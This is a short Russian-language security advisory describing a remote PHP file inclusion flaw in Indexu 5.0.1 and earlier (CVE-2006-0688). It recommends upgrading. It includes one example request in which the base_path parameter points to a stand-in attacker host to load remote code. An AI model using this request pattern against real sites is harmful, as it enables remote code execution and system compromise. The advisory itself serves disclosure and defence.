Security Lab

PHP-инклюдинг в Indexu

Дата публикации:11.02.2006
Дата изменения:24.03.2009
Всего просмотров:3135
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: CVE-2006-0688
CVE-2006-1767
CVE-2006-7017
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Indexu 5.x
Уязвимые версии: Indexu 5.0.1 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю обойти ограничения безопасности и скомпрометировать уязвимую систему.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "base_path" сценария "application.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе. Пример:

http://www.target.com/[path]/application.php?base_path=http://attacker.com/evil?

URL производителя: www.nicecoder.com

Решение: Установите последнюю версию с сайта производителя.

Источник:

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: Indexu <= 5.0.1 Remote File Inclusion